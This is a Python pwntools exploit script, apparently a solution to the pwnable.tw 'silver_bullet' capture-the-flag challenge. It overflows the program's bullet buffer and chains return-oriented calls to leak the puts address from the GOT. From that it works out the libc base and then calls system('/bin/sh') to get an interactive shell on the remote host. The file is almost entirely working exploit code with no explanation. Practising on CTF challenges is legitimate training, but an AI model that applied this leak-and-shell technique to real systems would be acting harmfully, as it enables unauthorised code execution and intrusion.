xxx.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#-------------------------

from pwn import *
import sys


#********************
host = "chall.pwnable.tw"
port = 10103
#********************

if len(sys.argv) < 2:
	env = {'LD_LIBRARY_PATH': './libc_32.so.6'}
	io = process("./silver_bullet", env=env)
	e = ELF("./silver_bullet")
	libc = ELF("/lib/i386-linux-gnu/libc.so.6")
else:
	io = remote(host, port)
	e = ELF("./silver_bullet")
	libc = ELF("./libc_32.so.6")


def create_bullet(power):
	io.recvuntil("Your choice :")
	io.sendline("1")

	io.recvuntil(":")
	io.send( str(power) )

def poweron(power):
	io.recvuntil("Your choice :")
	io.sendline("2")

	io.recvuntil(":")
	io.send( str(power) )

def bitch():
	io.recvuntil("Your choice :")
	io.sendline("3")

def quits():
	io.recvuntil("Your choice :")
	io.sendline("4")


cmp = 0x0804862C
data= dict()
data['__libc_start_main_plt'] = 0x080484C8
data['puts_plt'] = 0x080484A8
data['puts_got'] = 0x0804AFDC
data['ret'] = 0x08048A19

if len(sys.argv) < 2:
	gdb.attach(io,"""
		b *0x08048A19
		""")

		# b *0x804862C
		# b *0x080488F0
		# b *0x080485EB

create_bullet("A"*(0x30-1) )
poweron("B")
p = "\xff"*0x4 #power
p += "BBB"
p += p32(data['puts_plt'])
p += p32( e.sym['main'] )
p += p32(data['puts_got'])
p += p32( e.sym['main'] )
poweron(p)

bitch()

io.recvuntil("win !!")

io.recvline()

data['puts'] = u32( io.recv(4) )
log.info("puts: %#x" %(data['puts']))
data['libcbase'] = data['puts'] - libc.symbols['puts']
libc.address = data['libcbase']

log.info("[+]libcbase: %#x" %(data['libcbase']) )


create_bullet("A"*(0x30-1) )
poweron("B")
l = "\xff"*4
l += "BBB"
l += p32(libc.symbols['system'])
l += p32(libc.search("/bin/sh").next() )*2

log.success("system: %#x" %(libc.symbols['system']))
log.failure("sh: %#x" %(next(libc.search("/bin/sh"))))

poweron(l)

bitch()

io.sendline("whoami")

io.interactive()